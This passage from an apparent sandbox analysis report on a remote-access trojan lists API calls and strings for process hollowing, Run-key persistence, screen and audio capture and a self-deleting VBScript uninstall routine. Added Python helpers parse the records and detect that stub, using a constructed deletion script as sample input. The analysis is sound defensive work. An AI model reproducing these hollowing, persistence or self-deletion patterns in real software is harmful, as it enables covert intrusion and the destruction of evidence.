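The function records above follow one fixed layout (an "APIs" block of direct and "Part of subcall function" calls, then the dump source, then the API ID, String ID and the opcode/instruction hashes). When a report runs to thousands of such entries, the practical question is which functions in the dumped image call a given API, and at which addresses. The following Python is an added example, not part of the Joe Sandbox report or its tooling: it parses records in exactly this layout and indexes them by API name. The `SAMPLE` text is constructed from two of the records above (the EnumSystemLocalesW entry is abridged to three calls); the field names and the `API.MODULE(args), ref: ADDR` call syntax are assumptions taken from the visible records, not from a published format specification.

```python
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Constructed sample in the report's "Executed Functions" layout: the
# GetUserNameW record and an abridged EnumSystemLocalesW record.
SAMPLE = """\
APIs
• GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7E7
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: NameUser
• String ID:
• API String ID: 2645101109-0
• Opcode ID: b83c9b6e74ee29b4b3c5d203829dc1b50a3012795622bded812fc81b4dbbb1d6
• Instruction Fuzzy Hash: 8801FF7290011CAADB14EB90DC45ADDBBBCEF44715F10017AB501B21D5EFB4AB898A98
APIs
  • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD), ref: 00446ED3
  • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
• EnumSystemLocalesW.KERNEL32(00450C5E,00000001), ref: 00450D3E
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: ErrorLast$EnumLocalesSystem_abort_free
• String ID:
• API String ID: 1084509184-0
• Opcode ID: 7c1b61f81489e07a7731e6ad51784a2f83adb3e1c219b5a3241bb94100a853af
• Instruction Fuzzy Hash: 94F05C3D30020557CB159F75D8057667F90EFC2711B164059FE098B242C675D846C754
"""

# One call line: optional "Part of subcall function XXXX: " prefix, then
# API.MODULE, an optional "(args)," group (absent for CRT calls such as
# "_free.LIBCMT ref: ..."), then the call-site address after "ref:".
CALL_RE = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-F]+): )?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\),)? ref: (?P<ref>[0-9A-F]+)$"
)
SECTION_HEADERS = {"Memory Dump Source", "Joe Sandbox IDA Plugin", "Yara matches", "Similarity"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: str
    ref: str
    caller: str = ""  # non-empty for "Part of subcall function" lines


@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)  # "API ID", "Opcode ID", ...


def parse_records(text):
    """Split the report text into FunctionRecord objects, one per "APIs" block."""
    records, section = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            records.append(FunctionRecord())
            section = "apis"
        elif line in SECTION_HEADERS:
            section = "meta"
        elif line.startswith("•") and records:
            body = line[1:].strip()
            if section == "apis":
                m = CALL_RE.match(body)
                if m:  # unparseable call lines are skipped rather than guessed at
                    records[-1].calls.append(ApiCall(m["api"], m["module"], m["args"] or "", m["ref"], m["caller"] or ""))
            else:
                key, _, value = body.partition(":")
                records[-1].fields[key.strip()] = value.strip()
    return records


def api_index(records, include_subcalls=False):
    """Map API name -> list of call-site addresses. Subcall lines are
    attributed to the callee function, so they are excluded by default."""
    index = defaultdict(list)
    for rec in records:
        for call in rec.calls:
            if call.caller and not include_subcalls:
                continue
            index[call.api].append(call.ref)
    return dict(index)


def summarize(records):
    """(API ID, [direct API names]) per record, handy for diffing two reports."""
    return [(rec.fields.get("API ID", ""), [c.api for c in rec.calls if not c.caller]) for rec in records]


if __name__ == "__main__":
    for api, refs in sorted(api_index(parse_records(SAMPLE)).items()):
        print(f"{api:<24} {', '.join(refs)}")
```

Running the same parser over a full report and diffing `summarize()` output between two samples is a quick way to spot which imported-API clusters (and therefore which capabilities) changed between builds; the `API String ID` and `Opcode ID` fields can be compared the same way.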
APIs
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: HeapProcess
• String ID:
• API String ID: 54951025-0
                                                                                                                                                                                              • Opcode ID: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                                                                                                                                                                                              • Instruction ID: 9504a653bcf427532d5064532c05f1d04939bb5561e35e6535c2a7eba45b7a60
                                                                                                                                                                                              • Opcode Fuzzy Hash: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                                                                                                                                                                                              • Instruction Fuzzy Hash: 84A00270506201CB57404F756F0525937D9654559170580755409C5571D62585905615
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417FC9
                                                                                                                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 00417FD4
                                                                                                                                                                                                • Part of subcall function 00418462: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418492
                                                                                                                                                                                              • CreateCompatibleBitmap.GDI32(?,00000000), ref: 00418055
                                                                                                                                                                                              • DeleteDC.GDI32(?), ref: 0041806D
                                                                                                                                                                                              • DeleteDC.GDI32(00000000), ref: 00418070
                                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 0041807B
                                                                                                                                                                                              • StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 004180A3
                                                                                                                                                                                              • GetIconInfo.USER32(?,?), ref: 004180DB
                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 0041810A
                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 00418117
                                                                                                                                                                                              • DrawIcon.USER32(00000000,?,?,?), ref: 00418124
                                                                                                                                                                                              • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 00418154
                                                                                                                                                                                              • GetObjectA.GDI32(?,00000018,?), ref: 00418183
                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000028), ref: 004181CC
                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000001), ref: 004181EF
                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000000,?), ref: 00418258
                                                                                                                                                                                              • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041827B
                                                                                                                                                                                              • DeleteDC.GDI32(?), ref: 0041828F
                                                                                                                                                                                              • DeleteDC.GDI32(00000000), ref: 00418292
                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00418295
                                                                                                                                                                                              • GlobalFree.KERNEL32(00CC0020), ref: 004182A0
                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00418354
                                                                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 0041835B
                                                                                                                                                                                              • DeleteDC.GDI32(?), ref: 0041836B
                                                                                                                                                                                              • DeleteDC.GDI32(00000000), ref: 00418376
                                                                                                                                                                                              • DeleteDC.GDI32(?), ref: 004183A8
                                                                                                                                                                                              • DeleteDC.GDI32(00000000), ref: 004183AB
                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 004183B1
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconLocal$BitmapBitsDisplayDrawEnumInfoSelectSettingsStretch
                                                                                                                                                                                              • String ID: DISPLAY
                                                                                                                                                                                              • API String ID: 1765752176-865373369
                                                                                                                                                                                              • Opcode ID: e7f0c94ea3cf5daa80797fed7648512a6613a050bfb8d1c4bcfe1f6bef1f1438
                                                                                                                                                                                              • Instruction ID: 6b2ada92df8522405a2cca839f58df11a8e30ba3d3d74bda048dad66fb1953bf
                                                                                                                                                                                              • Opcode Fuzzy Hash: e7f0c94ea3cf5daa80797fed7648512a6613a050bfb8d1c4bcfe1f6bef1f1438
                                                                                                                                                                                              • Instruction Fuzzy Hash: 39C17C71508344AFD3209F25DC44BABBBE9FF88751F04092EF989932A1DB34E945CB5A
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0041728C
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041728F
                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 004172A0
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004172A3
                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004172B4
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004172B7
                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004172C8
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004172CB
                                                                                                                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
                                                                                                                                                                                              • GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
                                                                                                                                                                                              • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004173C0
                                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00417440
                                                                                                                                                                                              • TerminateProcess.KERNEL32(?,00000000), ref: 00417454
                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041748B
                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417558
                                                                                                                                                                                              • SetThreadContext.KERNEL32(?,00000000), ref: 00417575
                                                                                                                                                                                              • ResumeThread.KERNEL32(?), ref: 00417582
                                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041759A
                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?), ref: 004175A5
                                                                                                                                                                                              • TerminateProcess.KERNEL32(?,00000000), ref: 004175BF
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 004175C7
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                                                                                                                                                              • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                                                                                                                                              • API String ID: 4188446516-3035715614
                                                                                                                                                                                              • Opcode ID: 0508007fc5a19f335f37bc9d6881170284180ec94406780ecb3836aa2a2a6048
                                                                                                                                                                                              • Instruction ID: 2a1bc7bdc729258c18c32f0bb95ec7660c06bfb5025054df3919bc75ccc59624
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0508007fc5a19f335f37bc9d6881170284180ec94406780ecb3836aa2a2a6048
                                                                                                                                                                                              • Instruction Fuzzy Hash: DFA17CB1508304AFD7209F65DC45B6B7BF9FF48345F00082AF689C2661E779E984CB6A
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 004112D4
                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0041151D
                                                                                                                                                                                                • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00412679
                                                                                                                                                                                                • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00412692
                                                                                                                                                                                                • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(?), ref: 0041269D
                                                                                                                                                                                                • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B643
                                                                                                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 0041135B
                                                                                                                                                                                              • OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0041137C
                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00411382
                                                                                                                                                                                                • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                                                                                                • Part of subcall function 004127D5: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                                                                                                • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                                                                                              • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 004113B3
                                                                                                                                                                                              • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0041140F
                                                                                                                                                                                              • GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
                                                                                                                                                                                              • lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B
                                                                                                                                                                                                • Part of subcall function 0041B59F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041B6B5,00000000,00000000), ref: 0041B5FB
                                                                                                                                                                                                • Part of subcall function 0041B59F: WriteFile.KERNEL32(00000000,00000000,00000000,004061FD,00000000,?,00000004,00000000,0041B6B5,00000000,00000000), ref: 0041B60F
                                                                                                                                                                                                • Part of subcall function 0041B59F: CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041B6B5,00000000,00000000), ref: 0041B61C
                                                                                                                                                                                              • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
                                                                                                                                                                                              • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 004114C4
                                                                                                                                                                                              • OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004114D9
                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004114E4
                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004114EB
                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004114F1
                                                                                                                                                                                                • Part of subcall function 0041B59F: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041B6B5,00000000,00000000,00000000), ref: 0041B5DE
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
                                                                                                                                                                                              • String ID: .exe$0DG$@CG$T@$WDH$exepath$open$temp_
                                                                                                                                                                                              • API String ID: 4250697656-2665858469
                                                                                                                                                                                              • Opcode ID: a8fea185397083a77c328c300189fb8836f68a2773d02d272e4e2518edd72712
                                                                                                                                                                                              • Instruction ID: e3cce03e36166c77d6950284f165d3805ee2b23d785f43ba83868d4dcf2b0e5d
                                                                                                                                                                                              • Opcode Fuzzy Hash: a8fea185397083a77c328c300189fb8836f68a2773d02d272e4e2518edd72712
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1651B671A043156BDB00A7A0AC49EFE736D9B44715F1041BBF905A72D2EF7C8E828A9D
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,?,0040C67D), ref: 004116A9
                                                                                                                                                                                                • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF,?,0040C67D), ref: 004116BC
                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C013
                                                                                                                                                                                              • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
                                                                                                                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C056
                                                                                                                                                                                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C065
                                                                                                                                                                                                • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                                                                                                                                • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                                                                                                                • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                                                                                                                • Part of subcall function 0041AB48: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,00403A40), ref: 0041AB6F
                                                                                                                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C280
                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0040C287
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                                                                                                              • String ID: ")$.vbs$@CG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                                                                                                                                                                              • API String ID: 3797177996-1998216422
                                                                                                                                                                                              • Opcode ID: 01cc2f86e07608c5813aafc1862e27373e96c5252dbc9bbc701897dff69bedcf
                                                                                                                                                                                              • Instruction ID: f1dcdd4a9e546d4cb200c8239a9b7392f8c22d31b5939825df829b517cfed74e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 01cc2f86e07608c5813aafc1862e27373e96c5252dbc9bbc701897dff69bedcf
                                                                                                                                                                                              • Instruction Fuzzy Hash: 088190316042005BC315FB21D852ABF77A9ABD1308F10453FF986A71E2EF7CAD49869E
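The routine above is the uninstall path: RegDeleteKeyA under 0x80000001 (HKEY_CURRENT_USER) removes the Run / Policies\Explorer\Run persistence, SetFileAttributesW(0x80) clears attributes so the files can be deleted, a .vbs is dropped in Temp and launched via ShellExecuteW "open", and the process exits. The string fragments ("On Error Resume Next", "while fso.FileExists(", "fso.DeleteFile ", "wend", "fso.DeleteFolder ", "fso.DeleteFile(Wscript.ScriptFullName)") are the pieces of a self-deleting VBScript that spins until the executable is gone, removes the install folder, then deletes itself. The Python below is an added triage helper, not code from the sample or from Joe Sandbox: it recognises that stub shape in files recovered from a user's Temp directory and extracts the paths it targeted, so a responder knows what was wiped. The script text, file names and install path used as input are constructed for the example; the fragment order in the constructed stub is an assumption, since the report lists strings alphabetically.

```python
import re

# Lower-cased substrings that together identify the self-delete stub.
# All four are fragments listed in the String ID line of this function.
SELF_DELETE_MARKERS = ("scripting.filesystemobject", "fso.fileexists(",
                       "fso.deletefile", "wscript.scriptfullname")

_WAIT_RE = re.compile(r'while\s+fso\.FileExists\("([^"]+)"\)', re.IGNORECASE)
_DELFILE_RE = re.compile(r'fso\.DeleteFile\s+"([^"]+)"', re.IGNORECASE)
_DELFOLDER_RE = re.compile(r'fso\.DeleteFolder\s+"([^"]+)"', re.IGNORECASE)


def analyse_vbs(text):
    """Return None if text is not a self-delete stub, else the paths it targets."""
    low = text.lower()
    if not all(marker in low for marker in SELF_DELETE_MARKERS):
        return None
    return {
        "waits_for": _WAIT_RE.findall(text),          # files it spins on until deleted
        "deleted_files": _DELFILE_RE.findall(text),   # explicit DeleteFile targets
        "deleted_folders": _DELFOLDER_RE.findall(text),
        "suppresses_errors": "on error resume next" in low,
        "self_deletes": True,                         # Wscript.ScriptFullName present
    }


def triage_temp(files):
    """files: iterable of (name, text) pairs, e.g. read from %TEMP% on an image.
    Returns [(name, findings)] for every .vbs that matches the stub shape."""
    hits = []
    for name, text in files:
        if not name.lower().endswith(".vbs"):
            continue
        findings = analyse_vbs(text)
        if findings is not None:
            hits.append((name, findings))
    return hits


# Constructed sample input (hypothetical install path and file names).
_EXE = r"C:\Users\user\AppData\Roaming\agent\agent.exe"
_DIR = r"C:\Users\user\AppData\Roaming\agent"
SAMPLE_STUB = "\r\n".join([
    "On Error Resume Next",
    'Set fso = CreateObject("Scripting.FileSystemObject")',
    f'while fso.FileExists("{_EXE}")',
    f'fso.DeleteFile "{_EXE}"',
    "wend",
    f'fso.DeleteFolder "{_DIR}"',
    "fso.DeleteFile(Wscript.ScriptFullName)",
])
BENIGN_VBS = ('Set fso = CreateObject("Scripting.FileSystemObject")\r\n'
              'fso.DeleteFile "C:\\temp\\old.log"')
SAMPLE_TEMP = [("del_stub.vbs", SAMPLE_STUB),
               ("cleanup.vbs", BENIGN_VBS),
               ("notes.txt", SAMPLE_STUB)]

if __name__ == "__main__":
    for name, findings in triage_temp(SAMPLE_TEMP):
        print(name, "waits for", findings["waits_for"],
              "removes folders", findings["deleted_folders"])
```

The marker test is deliberately strict (all four fragments must be present) so ordinary cleanup scripts that merely use FileSystemObject.DeleteFile are not flagged; the extracted "waits_for" path is the executable the RAT was installed as, which is the artefact to pivot on in the Run-key and Prefetch evidence.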
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A2C2
                                                                                                                                                                                              • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A2D6
                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0041A2FE
                                                                                                                                                                                              • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00473EE8,00000000), ref: 0041A30F
                                                                                                                                                                                              • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A350
                                                                                                                                                                                              • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A368
                                                                                                                                                                                              • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A37D
                                                                                                                                                                                              • SetEvent.KERNEL32 ref: 0041A39A
                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(000001F4), ref: 0041A3AB
                                                                                                                                                                                              • CloseHandle.KERNEL32 ref: 0041A3BB
                                                                                                                                                                                              • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A3DD
                                                                                                                                                                                              • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A3E7
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                                                                                                                              • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$>G
                                                                                                                                                                                              • API String ID: 738084811-1408154895
                                                                                                                                                                                              • Opcode ID: 64579ecce08cc8496382223706d958727b13b5937c815ba4443b510fe6f07952
                                                                                                                                                                                              • Instruction ID: 916def08b3adcafa46b043c64cdff30cc67d21214e861a912cda69be872b019d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 64579ecce08cc8496382223706d958727b13b5937c815ba4443b510fe6f07952
                                                                                                                                                                                              • Instruction Fuzzy Hash: B951C1712442056AD214BB31DC86EBF3B9CDB91758F10043FF456A21E2EF389D9986AF
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00471B02,00000002,00000000,00000000), ref: 00401CE0
                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00471B04,00000004,00000000,00000000), ref: 00401CF0
                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00471B0E,00000002,00000000,00000000), ref: 00401D22
                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$Write$Create
                                                                                                                                                                                              • String ID: RIFF$WAVE$data$fmt
                                                                                                                                                                                              • API String ID: 1602526932-4212202414
                                                                                                                                                                                              • Opcode ID: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                                                                                                                                              • Instruction ID: 129ba3454a43ec42bedb537cb07bfa8f9eb5569c2d2d4c431363fc199bcfbd5c
                                                                                                                                                                                              • Opcode Fuzzy Hash: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 66416F726443187AE210DB51DD86FBB7EECEB85F54F40081AFA44D6090E7A4E909DBB3
